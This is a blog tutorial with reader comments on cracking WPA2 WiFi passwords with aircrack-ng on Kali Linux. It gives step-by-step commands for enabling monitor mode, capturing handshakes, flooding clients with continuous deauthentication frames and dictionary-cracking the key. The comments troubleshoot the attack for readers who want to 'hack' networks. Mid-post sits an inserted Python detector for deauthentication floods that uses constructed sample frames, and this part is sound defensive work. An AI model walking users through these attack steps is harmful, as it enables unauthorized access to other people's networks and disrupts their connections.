Cracking WPA2 WiFi password using aircrack-ng Kali Linux

Cracking a WPA2 WiFi password is not really an easy thing to do:
no, you can't crack it with a click, and there is no software that will give you the password without some hard work ...
but don't run away, you can still crack it with a few steps here :) and we will do it using aircrack-ng

For a quick WiFi cracking walkthrough, check this video

Requirements: to crack a WPA2-PSK encrypted WiFi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed
  a- if you don't have the aircrack-ng suite, get it with this command in the terminal
sudo apt-get install aircrack-ng
2- a wireless network adapter that supports monitor mode, such as
  a- Alfa 2W AWUS036NH
  b- Alfa AWUS036H
  c- wifiy-city 56G
  d- you can also check this page for card compatibility and drivers
3- a word list (dictionary) containing the candidate passphrases to try

Now let's get to work.
I will be using the wifiy-city 56G card on Kali Linux 2 (Sana).

1) open up your terminal as root and type
ifconfig
this will show you all the network interfaces connected to your device.

if your wireless adapter is working fine you should see "wlan0"; the name may differ if you have more than one wireless adapter connected.

2) now to start monitor mode type
airmon-ng start wlan0
'airmon-ng' is the tool that puts the card into monitor mode
'wlan0' is your wireless interface
after this command monitor mode is started
as you can see, monitor mode is running on wlan0mon, so that is your card name from now on
in the red area is a list of process IDs that can cause trouble during the process, so kill those processes by typing
kill <pid>
in my case
kill 743 898 1070 1071 1081
now type ifconfig and it will show the newly created monitoring interface, i.e. wlan0mon. In most cases it will be mon0.

3) to show the list of available WiFi networks type
airodump-ng wlan0mon

airodump-ng is the WiFi packet capturing tool
wlan0mon is my monitoring interface
airodump-ng will start capturing all packets; from the captured packets
select your target and note its 'BSSID' (BSSID = basic service set identifier) and channel,
then stop the capture using Ctrl+C.

4) Start capturing the packets of your target network
type the following command
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon
i.e.: airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon

this will start capturing packets.
if you get the handshake right away you won't need the aireplay command...
if you don't get the handshake yet, while the capture goes on, open a new terminal as root and type
aireplay-ng -0 0 -a <bssid> wlan0mon
aireplay-ng = tool for deauthentication, fake authentication and other packet injection
-0 = the deauthentication attack
0 = deauth count (0 means keep sending until you stop it)
-a = the BSSID of the access point
here we are sending deauthentication requests so that the clients reconnect and the capture picks up the handshake.
In my case the command looks like
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

after a few seconds stop it using Ctrl+C.
now we have successfully captured the WPA handshake

5) Stop the capture using Ctrl+C and type "ls", which lists the files and directories in the current directory.
Select the file with the ".cap" extension and type the following command
aircrack-ng -w <full path of the word list> <name of the .cap file>
aircrack-ng is the tool that does the actual password cracking
In my case the command looks like
aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
For the wordlist, check this post: Best Password dictionary
Now it starts trying passphrases from the list.

and now all you have to do is wait till you see the lovely news (KEY FOUND! [your key is here] ;) ).

All steps in a few lines
1) airodump-ng wlan0mon
2) airodump-ng -c 9 -w wifi --bssid C4:6E:1F:F6:34:B8 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap
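The defender's side of step 3 above (the deauthentication burst from aireplay-ng), as an added example that is not part of this post or of the aircrack-ng suite: a sensor in monitor mode can recognise such a burst because it is loud on the air. The script parses raw 802.11 management headers, counts deauthentication frames per BSSID inside a sliding time window and raises an alert when the count in the window reaches a threshold. Every MAC address, timestamp and frame in the sample capture is constructed inline; the window and threshold values are assumed defaults, not anything the tutorial specifies.

```python
"""Sliding-window detector for 802.11 deauthentication floods.

Added illustration for this post (not part of aircrack-ng or the original
tutorial). Input is raw 802.11 MAC frames with any radiotap header already
stripped, each paired with a capture timestamp in seconds. All MAC
addresses and frames in the sample capture below are constructed here.
"""
import struct
from collections import defaultdict, deque

FRAME_TYPE_MGMT = 0      # 802.11 frame-control type value for management frames
SUBTYPE_DEAUTH = 12      # management subtype 12 = deauthentication
SUBTYPE_BEACON = 8       # management subtype 8 = beacon
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_header(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3) from the 24-byte MAC header, or None."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]                 # first frame-control octet
    ftype = (fc0 >> 2) & 0x3       # bits 2-3: type
    subtype = (fc0 >> 4) & 0xF     # bits 4-7: subtype
    return ftype, subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])


def is_deauth(frame: bytes) -> bool:
    hdr = parse_mgmt_header(frame)
    return hdr is not None and hdr[0] == FRAME_TYPE_MGMT and hdr[1] == SUBTYPE_DEAUTH


def deauth_reason(frame: bytes):
    """Reason code (2-byte little-endian body field) of a deauth frame, else None."""
    if not is_deauth(frame) or len(frame) < 26:
        return None
    return struct.unpack_from("<H", frame, 24)[0]


def detect_deauth_flood(packets, window_s=10.0, threshold=20):
    """packets: chronological iterable of (timestamp_seconds, frame_bytes).

    Keeps, per BSSID (addr3), the timestamps of recent deauth frames and
    raises one alert per BSSID when the count inside the window reaches
    the threshold. A handful of deauths is normal; a burst is not.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, frame in packets:
        if not is_deauth(frame):
            continue
        _, _, dst, _src, bssid = parse_mgmt_header(frame)
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_s:     # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid,
                "count": len(q),
                "broadcast": dst == BROADCAST,   # broadcast deauth kicks every client at once
                "first_ts": q[0],
                "last_ts": ts,
                "reason": deauth_reason(frame),
            })
    return alerts


# --- constructed sample data (not a real capture) -------------------------

def build_mgmt_frame(subtype, dst, src, bssid, body=b"", seq=0):
    """Assemble a minimal management frame: frame control, duration, 3 addresses, seq ctrl, body."""
    fc = bytes([(subtype << 4) | (FRAME_TYPE_MGMT << 2), 0x00])
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return fc + b"\x00\x00" + addrs + struct.pack("<H", (seq & 0xFFF) << 4) + body


def sample_capture():
    """Beacons from two APs, two ordinary unicast deauths, and one broadcast deauth burst."""
    ap1, ap2, sta = "02:00:00:aa:bb:01", "02:00:00:aa:bb:02", "02:00:00:cc:dd:01"
    pkts = [(10.0 * i, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, ap, ap, b"\x00" * 12, i))
            for i in range(12) for ap in (ap1, ap2)]
    # normal traffic: a client leaving ap2 (reason 3 = deauthenticated because leaving)
    pkts += [(5.0, build_mgmt_frame(SUBTYPE_DEAUTH, ap2, sta, ap2, struct.pack("<H", 3))),
             (95.0, build_mgmt_frame(SUBTYPE_DEAUTH, ap2, sta, ap2, struct.pack("<H", 3)))]
    # burst: 30 broadcast deauths in the name of ap1 within 3 seconds (reason 7)
    pkts += [(100.0 + 0.1 * i, build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, ap1, ap1,
                                               struct.pack("<H", 7), i))
             for i in range(30)]
    return sorted(pkts, key=lambda p: p[0])


def run_sample():
    return detect_deauth_flood(sample_capture())


if __name__ == "__main__":
    for a in run_sample():
        print(f"deauth flood on {a['bssid']}: {a['count']} frames in "
              f"{a['last_ts'] - a['first_ts']:.1f}s, broadcast={a['broadcast']}, reason={a['reason']}")
```

On real data you would feed the detector frames read from a monitor-mode capture (for instance the .cap written by airodump-ng, after stripping the radiotap or PPI header). Deauths from clients that genuinely leave are few and unicast; the `-0 0` run in the tutorial produces a continuous broadcast stream, which is what the per-BSSID count and the broadcast flag separate.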

have a great day :)
you can check the video on YouTube to see how it works and cracks the password

Best WiFi adapters to work with aircrack-ng
Here is a list of wireless cards that support injection and monitor mode
1. Alfa AWUS036NHA (2.4GHz) http://amzn.to/1RzUNKR
2. TP-LINK TP-WN722N $13.44 http://amzn.to/1SMe8b1
3. AWUS036H (2.4GHz) $26.99 http://amzn.to/1UDrZnr
4. TP-Link WN722N (2.4GHz) $18.97 http://amzn.to/1UDsii4
5. D-Link DWA-110 http://amzn.to/1RXovvp



Comments

  1. What is morethan.txt? Tell me please. I have rockyou.text.gz; are these both the same?

    1. Check this post I just wrote; after reading it you will understand everything about rockyou.text.gz and what I meant by morethan8.txt
      http://kalitut.blogspot.com/2015/12/best-password-dictionary.html

    2. hey my name is demi, I want to become the best government tool {HACKER}, please make me your student. demistusdamian@gmail.com (my nickname HAWK)

  2. After entering the last command I get the error "directory doesn't exist". I checked the file and it is under usr/share/wordlists; am I entering the wrong command?

    1. aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

      does your file have the same name as mine? (more_than_8.txt)

    2. dude, you're using an OS bigger than you... start using those easy phone apps for hacking, XlOL..

    3. there is nothing bigger than the human mind in here!
      if he wants to do it he will learn to do it

  3. I have googled extensively regarding my wireless card, and followed literally hundreds of step-by-step guides with fw cutter etc. What I'm getting is: I can switch to mon mode, I can see my AP and others, I did the aireplay injection test, and it shows injection is working! BUT! When I try to authenticate on my AP I never actually get any handshake, and I can never see clients I manually connect to my AP. I know I'm close enough because it's my own AP, literally a meter away from my machine. It's definitely in monitor mode and I can inject, 'so it says'. Just not sure where I'm going wrong. My device is the Broadcom b4312 lpphy rev 01. I blacklisted other drivers etc. and when I use check it says device b43x, so I'm assuming it's running the correct driver, and FW cutter didn't show any errors, so I'm assuming the firmware has been patched. Spent days and days with this one, any tips would be massively appreciated. Many thanks.

    1. DEAUTH - DOESN'T WORK. Associated clients on my network don't show when I manually connect another machine to my own AP to see if airodump picks it up. I tried to DEAUTH all clients on the AP and nothing. Fake auth doesn't work as I get nothing with open system, and shared key shows an error locating the shared key file

    2. I'm sorry, with this problem I can't help because I face the same problem sometimes and couldn't really find a way to fix it yet

      some APs give me the handshake and some not
      my friend's house is close to mine and I can get his AP's handshake
      and at the same time I can't get my AP's handshake even though it's closer than his AP
      I just don't really understand the problem behind this

  4. Hi bro ..... once you have found the keys, how do you use them ..... please tell me bro....

    1. You put it in on your computer like when you want to connect to the wifi

  5. Hi bro, I'm happy for what you did. I get an error:
    BSSID
    **********
    ESSID
    **********
    ENCRYPTION
    No data - WEP or WPA

    Choosing first network as target

    Opening ******.cap

    Got no data packets from target network

    Quitting aircrack-ng

    1. Can you help me to solve it thanks again :)

    2. Maybe it's because I use a DVD in live amd64 mode. I didn't install Kali, I just use it in live mode

    3. you need to get the handshake again, so start the task all over

  6. It's been more than 24 mins but it's not showing the handshake, what do I do now?? Please help.

    1. This comment has been removed by the author.

    2. Most wifi adapters are made to get signal within your own home. Get a wifi adapter with an RTL8187L chipset such as the Alfa models.. They have good range.

  7. hi bro, the last command aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
    gives me "please specify a dictionary (option -w)"

    1. change the .cap file name to your own .cap file name!
      change more_than_8.txt to your own dictionary file name!

      if you don't know how to get the dictionary check this post
      https://kalitut.blogspot.com/2015/12/best-password-dictionary.html

    2. I changed the name and it still tells me to specify a dictionary option. What do I do?

  8. Hi man, I am using a Ralink wireless USB adapter, am I going to achieve a result?

    1. Just put your .cap file on the desktop and simply drag and drop it into the terminal.

  9. My file is in home and when I type aircrack-ng -w /home/wifi-01.cap
    I get an error saying the file does not exist. What do I type?

    1. try the command without /home/

      so it should look like this: aircrack-ng -w wifi-01.cap

    2. help!! I tried aircrack-ng -w wifi-01.cap
      and got "No file to crack specified."

  10. How about the same tutorial for 2016.1? Because many of us are having issues with packet injection, even with the correct driver/chipset.
    I do not want to install an older version.

    1. will make one soon, but what about the AP you are targeting, is it N or the old chipset?

  12. Hello. I found this blog after attempting many times to crack my own WiFi access point. I'm using an Alfa AWUS036NH USB adapter, running a Kali VM on Ubuntu. After trying these steps and other variations of them, I found a command on another site:

    aireplay-ng -9 wlan0mon

    I read that it's supposed to test if packet injection is supported by my adapter. But I'm wondering if it is really there to test whether any Access Points it finds can be packet injected. Does anyone know? The response to this command was something to the effect of:

    No Answer...
    Found 0 APs

    Can anyone clarify? Thanks in advance!

    1. aireplay-ng is a tool for deauthentication
      what it really does is disconnect all users from the AP, and then when they reconnect you start capturing the packets

    2. This comment has been removed by the author.

    3. Thanks for your response.

      So that command does not do what I thought it did? Because it did not disconnect all users from the AP either. It looked like it was searching for APs and didn't find any. Basically I can't get this tutorial (or any other variation that I've found online) to work for deauthentication or capturing packets. I've tried my AP and several others that get a decent signal.

      Could it just be the case that all APs within my range are protected against this type of attack?

    4. the command aireplay-ng should disconnect all users from the AP...
      in your case I'm not sure what the problem is...
      but what's the wifi adapter you are using? name it

    5. Walid- As I said in my original question I'm using the Alfa AWUS036NH USB adapter. This adapter was recommended by the initial resource I was looking at for cracking WiFi, so I'm thinking it should have the necessary capabilities. Thanks.

    6. oh I'm sorry, I forgot it's an Alfa AWUS036NH...
      okay, well, as you know this adapter should work fine... now we have to check the AP, so what's your AP name and version

    7. No problem. It's an Arris TG1682G. The hardware rev is 9.0

  13. Replies
    1. Great :) what WiFi adapter are you using ?

  14. Hello Walid,

    What adapter should I use?

    1. hi there, there is a list at the end of the post of adapters that work with this tutorial

      1. Alfa AWUS036NHA (2.4GHz) http://amzn.to/1RzUNKR
      2. TP-LINK TP-WN722N $13.44 http://amzn.to/1SMe8b1
      3. AWUS036H (2.4GHz) $26.99 http://amzn.to/1UDrZnr
      4. TP-Link WN722N (2.4GHz) $18.97 http://amzn.to/1UDsii4

      all of them work fine but the Alfa adapters are the best of the best

  15. I want to learn to hack please make me your student.

    1. you can learn by reading what i have on this website :)

  16. Hey ....
    my laptop does not do monitor mode, can I hack a wifi password without monitor mode.....??

    1. no you can't
      you need a USB WiFi adapter

  17. dude, to hack, we need to be near the AP and a couple of clients of the AP, right? so we can get the handshake? if we only have AP access (because we are pointing from a long distance) we won't be able to hack/crack the password?

  18. This comment has been removed by a blog administrator.

  19. This comment has been removed by a blog administrator.

  20. hey bro! I am happy with what you did. Everything was going fine with these commands. But I got a problem after the last command: #aircrack-ng -w /usr/share/wordlists/wifi.txt ***-01.cap
    error:
    fopen (directory) failed: No such file or directory
    fopen (directory) failed: No such file or directory
    opening ***-01.cap
    Read 509127 packets.
    #BSSID ESSID ENCRYPTION
    xx:xx:xx:xx:xx:xx xyz WPA(1 handshake)

    choose first network as target.
    opening ***-01.cap
    please specify a dictionary (option -w)

    Quitting aircrack-ng.......

    I don't suppose that my cap file has been broken. Am I wrong?? What might be the problem??? and what might be the solution??? please provide me guidance..

    1. hi bro
      I think the problem is here: /usr/share/wordlists/wifi.txt
      is your password dictionary in that path?

    2. I think yes, it is the path of my password dictionary. Because when I wrote the command #ls initially it did not show the rockyou.txt file, but when I wrote the #ls command after the execution of the first three commands of the tutorial, i.e. cp /usr/share/wordlists/rockyou.txt.gz . , gunzip rockyou.txt.gz and cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wifi.txt, it shows both rockyou.txt and wifi.txt
      I also tried other paths, i.e. Desktop/usr/share/wordlists/wifi.txt
      and Desktop/share/wordlists/wifi.txt
      but I receive the same error.

    3. and yeah, I also tried interchanging the places of -w /usr/share/wordlists/wifi.txt and ***-01.cap but the problem remains the same.

    4. Error message "fopen(dictionary) failed: No such file or directory"
      This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.

    5. try changing the password dictionary to another name, or just try it with rockyou.txt
      aircrack-ng -w /usr/share/wordlists/rockyou.txt wifi-01.cap

  21. Hey walid... I have tried many times but when I aircrack... it shows 'please specify a dictionary (option -w)' even though I specified the wifi-01.cap file. So how? Help me plz.

    1. when it asks you to specify a dictionary, you need to specify a txt file that has a list of passwords to try

  22. Hello walid... I tried so many times as you posted here.. but when I aircrack it shows 'please specify a dictionary (option -w)' even though I specified the file location. Help me plz

    1. Hi Niethiya
      please check this newest post about wifi cracking
      how to hack wifi password

  23. what to do if we get the handshake after 'airodump-ng -c -w --bssid wlan0mon'?

  24. after that you need to use a dictionary to find the password!

    1. Do I need to try multiple dictionaries to determine the password? And can multiple dictionaries be run one after another?

    2. well, you can try as many dictionaries as you want till you find the password you are looking for,,
      I don't know if there is a way to run dictionaries one after another, but soon I will make a post on how to make one huge dictionary and make the cracking progress faster

